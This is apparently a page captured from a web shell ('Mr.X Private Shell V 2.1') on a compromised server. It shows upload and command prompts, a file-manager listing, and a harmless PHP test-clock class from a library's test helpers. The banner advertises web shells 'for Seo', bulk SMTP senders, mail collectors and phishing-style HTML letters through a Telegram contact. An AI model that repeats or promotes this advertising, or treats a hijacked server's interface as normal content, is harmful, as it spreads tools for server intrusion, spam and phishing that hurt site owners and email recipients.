__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace Tuf\Tests\TestHelpers;

use Tuf\Helper\Clock;

/**
 * A test clock class that uses the time from the test fixtures as starting time.
 */
class TestClock extends Clock
{
    /**
     * The current time.
     *
     * Defaults to the same timestamp used in generate_fixtures.py to create
     * test fixtures.
     */
    private $time = 1577836800;

    /**
     * {@inheritdoc}
     */
    public function getCurrentTime(): int
    {
        // Increment the time simulate time passing between calls.
        $this->time++;
        return $this->time;
    }
}

Filemanager

Name Type Size Permission Actions
DurableStorage Folder 0775
FixturesTrait.php File 3.54 KB 0664
TestClock.php File 577 B 0664
TestRepository.php File 894 B 0664
UtilsTrait.php File 1.8 KB 0664
Filemanager